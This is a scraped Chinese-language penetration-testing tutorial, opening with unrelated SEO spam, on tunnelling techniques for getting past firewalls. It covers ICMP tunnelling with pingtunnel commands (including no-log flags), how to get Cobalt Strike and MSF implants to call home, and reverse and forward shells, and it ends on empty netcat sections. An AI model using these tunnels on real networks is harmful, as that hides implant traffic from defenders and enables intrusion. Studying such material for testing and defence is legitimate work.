亚星网站代理,wordpress for sae 4.4,龙岗微信网站制作,廊坊百度快照优化哪家服务好1. 隧道技术
在进行渗透测试以及攻防演练的时候#xff0c;通常会存在各种边界设备、软硬件防火墙、IPS等设备来检测外部连接情况#xff0c;这些设备如果发现异常#xff0c;就会对通信进行阻断。
那么隧道技术就是一种绕过端口屏蔽的通信方式#xff0c;在实际情况中防…1. 隧道技术
在进行渗透测试以及攻防演练的时候通常会存在各种边界设备、软硬件防火墙、IPS等设备来检测外部连接情况这些设备如果发现异常就会对通信进行阻断。
那么隧道技术就是一种绕过端口屏蔽的通信方式在实际情况中防火墙上会设定各种安全策略比如允许某种类型的端口通过阻断某种端口通过等情况。那么隧道技术就是将数据包封装成功防火墙允许通过的数据包类型及端口然后穿越防火墙与对方进行通信当被封装的数据包到达后再将数据包还原。
例如防火墙拦截了TCP通信那么HTTP、HTTPS等协议都将无效那么就可以使用SMB协议DNS协议、ICMP协议进行建立隧道进行通信。
1.1. 内网—隧道技术
那么为什么再内网中使用到隧道技术这是由于在内网中通常上传的木马通信会被软硬件防火墙的策略拦截那么就可以利用隧道进行对木马通信也就是数据通信进行封装从而改变通信协议绕过拦截解决CS、MSF无法上线或数据传输不稳定无回显等情况。
1.2. 常见的隧道协议 1.3. 前置条件
入站限制出站无限制
如果入站被限制只能访问80端口或者一些其它端口可能在基础的前期的渗透过程中需要通过文件上传等方式获取到基础的权限然后再进行后续的渗透出站是全通的从本质来说就无需进行隧道技术了直接正常上传木马进行反弹即可最典型的就是反向shell。
入站无限制出站限制
如果入站无限制那么就可以通过各种手段上传木马或后门最典型的就是正向shell
出入站均限制
如果出入站均存在限制那么就要考虑它限制的内容的如果只是简单的限制还好如果限制做的比较严谨那么就可能存在无法解决的办法。
2、网络层隧道技术
2.1、 ICMP隧道技术
通常在通信协议中如果两台主机需要互相通信那么就需要提前放开相应的端口用于通信而且ICMP是不需要这些端口进行通信的ICMP是依靠Ping命令去和远端主机进行通信的而且ICMP隧道就是在通信过程中将TCP/UDP的数据封装在ICMP的Ping数据包中从而穿越防火墙。
2.2、常见工具
pingtunnelhttps://github.com/esrrhs/pingtunnel
cs配置 生成木马使用监听器1来生成
……
服务端
./pingtunnel -type server -key 1111 客户端
pingtunnel.exe -type client -l 127.0.0.1:1111 -s 192.168.26.144 -t 192.168.26.144:2222 -tcp 1 -noprint 1 -nolog 1 -key 1111 效果展示 3、传输层隧道技术
netcat
nc正向代理
被攻击主机 攻击主机 nc反向代理
被攻击主机 攻击主机
